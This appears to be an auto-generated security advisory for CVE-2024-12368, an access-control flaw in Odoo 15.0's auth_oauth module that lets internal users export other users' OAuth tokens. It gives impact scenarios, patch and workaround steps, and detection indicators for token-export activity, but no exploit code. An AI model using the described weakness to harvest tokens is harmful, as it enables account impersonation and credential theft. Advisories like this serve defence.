CVE-2024-12368 – An improper access control vulnerability in Odo... (How to Fix)

Q: What is the severity of CVE-2024-12368?

CVE-2024-12368 has a CVSS score of 8.1 (HIGH). An improper access control vulnerability in Odoo's auth_oauth module allows internal users to export OAuth tokens belonging to other users. This affects Odoo Community 15.0 and Odoo Enterprise 15.0 installations. Attackers could use stolen tokens to impersonate users and access external services.

📋 TL;DR

An improper access control vulnerability in Odoo's auth_oauth module allows internal users to export OAuth tokens belonging to other users. This affects Odoo Community 15.0 and Odoo Enterprise 15.0 installations. Attackers could use stolen tokens to impersonate users and access external services.

💻 Affected Systems

Products:

Odoo Community
Odoo Enterprise

Versions: 15.0

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects installations with OAuth authentication enabled. Requires internal user access.

📦 What is this software?

Odoo by Odoo

View all CVEs affecting Odoo →

Odoo by Odoo

View all CVEs affecting Odoo →

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker gains access to all user OAuth tokens, enabling full impersonation across connected services, potential data exfiltration, and account takeover in external systems.

🟠

Likely Case

Internal user with malicious intent exports tokens of specific targets to gain unauthorized access to their external accounts and services.

🟢

If Mitigated

Limited impact with proper access controls and monitoring, though token exposure still represents a credential leak.

🌐 Internet-Facing: MEDIUM

🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: MEDIUM

Exploitation requires internal user credentials. The vulnerability is in the web interface functionality.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Odoo 15.0 with security patch applied

Vendor Advisory: https://github.com/odoo/odoo/issues/193854

Restart Required: No

Instructions:

1. Update Odoo to the latest patched version of 15.0. 2. Apply the security patch from the Odoo repository. 3. Verify the auth_oauth module has proper access controls.

🔧 Temporary Workarounds

Disable OAuth token export functionality

all

Temporarily remove or restrict the export feature for OAuth tokens in the auth_oauth module.

Modify Odoo module code to remove token export capability

Restrict internal user permissions

all

Review and limit which internal users have access to user administration functions.

Review Odoo user groups and permissions

🧯 If You Can't Patch

Implement strict access controls and monitor user activity for token export attempts
Consider disabling OAuth authentication temporarily if feasible

🔍 How to Verify

Check if Vulnerable:

Check if running Odoo 15.0 with auth_oauth module enabled. Test if internal users can export other users' OAuth tokens.

Check Version:

odoo --version or check Odoo web interface About page

Verify Fix Applied:

After patching, verify that internal users cannot export OAuth tokens belonging to other users.

📡 Detection & Monitoring

Log Indicators:

Unusual OAuth token export activities
Multiple token access attempts from single user

Network Indicators:

Unexpected OAuth token usage patterns to external services

SIEM Query:

Search for auth_oauth module export activities in Odoo access logs

📊 Metadata

CVE ID: CVE-2024-12368

CVSS v3 Score: 8.1 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CWE: CWE-284

EPSS Score: 0.13% exploit probability (32.1th percentile)

Published: February 25, 2025

Last Updated: February 28, 2025

🔗 References

https://github.com/odoo/odoo/issues/193854 Exploit,Issue Tracking,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-12368, you might also want to check these: